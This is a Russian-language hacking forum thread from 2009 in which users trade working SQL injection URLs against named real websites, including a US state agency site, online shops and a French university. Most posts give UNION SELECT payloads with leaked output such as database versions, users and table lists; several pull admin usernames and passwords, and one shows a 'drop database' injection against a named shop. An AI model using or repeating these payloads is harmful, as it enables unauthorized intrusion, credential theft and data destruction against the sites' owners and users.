ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10861  
Старый 07.10.2009, 00:32
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

http://score.dnr.sc.gov/deep.php?subject=2&topic=1+union+select+1,concat(0 x2a,version(),user(),database()),3,4,5+limit+1,1/*

4.1.20 score@localhostscore
 
Ответить с цитированием

  #10862  
Старый 07.10.2009, 04:03
Kamik
Флудер
Регистрация: 02.12.2008
Сообщений: 4,294,967,295
Провел на форуме:
689466

Репутация: 155


Отправить сообщение для Kamik с помощью ICQ
По умолчанию

Какойто онлаин магазин)))

http://www.avtax.ru/?info=3+union+select+1,concat_ws(user(),0x3a,versi on(),0x3a,database()),3,4,5/*&subinfo=9

А вот и прикол! вывод результата

# Кто мы?

# :avtax2@localhost.localdomain5.0.24-standardavtax2@localhost.localdomain:avtax2@localh ost.localdomaindb_avtax2


Далее

http://www.avtax.ru/?info=3+union+select+1,table_name,3,4,5+from+infor mation_schema.tables/*&subinfo=9

PHP код:
# Кто мы?

# CHARACTER_SETS

# COLLATIONS

# COLLATION_CHARACTER_SET_APPLICABILITY

# COLUMNS

# COLUMN_PRIVILEGES

# KEY_COLUMN_USAGE

# ROUTINES

# SCHEMATA

# SCHEMA_PRIVILEGES

# STATISTICS

# TABLES

# TABLE_CONSTRAINTS

# TABLE_PRIVILEGES

# TRIGGERS

# USER_PRIVILEGES

# VIEWS

# tabCategories

# tabInfo

# tabMainInfo

# tabModels

# tabSex

# tabSubTovars

# tabTovars

# tabTovars_copy 
Далее думаю ясно всем будет))))

Также можно выполнить

http://www.avtax.ru/?info=3+drop+database+db_avtax2/*&subinfo=9

Но я не стал этого делать...

Последний раз редактировалось Kamik; 07.10.2009 в 04:10..
 
Ответить с цитированием

  #10863  
Старый 07.10.2009, 19:46
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.soltis-toiles.com/cat.php?p=11+UNION+SELECT+1,version(),3,4,5,6,7,8, 9+LIMIT+1,1

Database name: soltis-stores
User name: soltis-stores@localhost
Database name: soltis-stores
 
Ответить с цитированием

  #10864  
Старый 08.10.2009, 00:18
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

http://www.firestone-duncan.com/print.php?topic=Services&cid=-1+union+select+1,2,'xekme',4,5,6+from+mysql.user--+
 
Ответить с цитированием

  #10865  
Старый 08.10.2009, 06:26
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.omatmerkit.inex.fi/default.asp?viewID=1474&productID=@@version
MsSQL
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
 
Ответить с цитированием

  #10866  
Старый 08.10.2009, 10:40
-JC-
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312

Репутация: 50
Отправить сообщение для -JC- с помощью ICQ
По умолчанию

Код:
http://www.techiwarehouse.com/cms/articles.php?cat=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16+--+
 
Ответить с цитированием

  #10867  
Старый 08.10.2009, 11:59
gooxakep
Новичок
Регистрация: 25.07.2009
Сообщений: 1
Провел на форуме:
8785

Репутация: -1
По умолчанию

http://www.topi-top.com.ua/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password)+f rom+admin--


http://www.modeli.com.ua/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password)+f rom+admin--

Последний раз редактировалось jokester; 08.10.2009 в 13:16.. Причина: правила темы прочитай
 
Ответить с цитированием

  #10868  
Старый 08.10.2009, 12:02
toross
Banned
Регистрация: 11.12.2008
Сообщений: 37
Провел на форуме:
178592

Репутация: 35
Отправить сообщение для toross с помощью ICQ
По умолчанию

4.1.22
Цитата:
http://freshfiction.com/page.php?id=-2029+union+select+1,2,3,4,version(),6,7,8,9,10--
 
Ответить с цитированием

  #10869  
Старый 08.10.2009, 13:41
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

pr5
http://www.cc-bassin-annonay.fr/communes/clubasso/consulterclubasso.php3?num=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26+from+users+/*+&css=2

pr5
http://www.latina.fr/index.php?id=3&art=-345+union+select+1,2,concat_ws(0x3a3a,pseudo,mdp,a dmin),4,5,6+from+users+--+

http://www.adofm.fr/index.php?id=65&art=943&idcat=-16+union+select+1,2,unhex(hex(concat_ws(0x3a3a,pse udo,mdp,admin))),4,5,6,7+from+users+--+&idvid=168

http://endirect.univ-fcomte.fr/index.php?id=numero_98_13_1&art=-1079'+union+select+1,group_concat(table_name),3,4, 5,6,7,8,9+from+information_schema.tables+/*+

http://www.technique-voile.com/actualites_voile/index.php?ID=-233'+UniOn+sElEct+1,2,3,4,5,6,7,8,9,10,11+from+adm in+--+
 
Ответить с цитированием

  #10870  
Старый 08.10.2009, 16:13
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

http://www.xatrik.ru/katalog/
Код:
catalog.php?id=-1+union+select+1,user%28%29,3,4,5,6,7--
xatrikr0_t@localhost
4.1.25
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ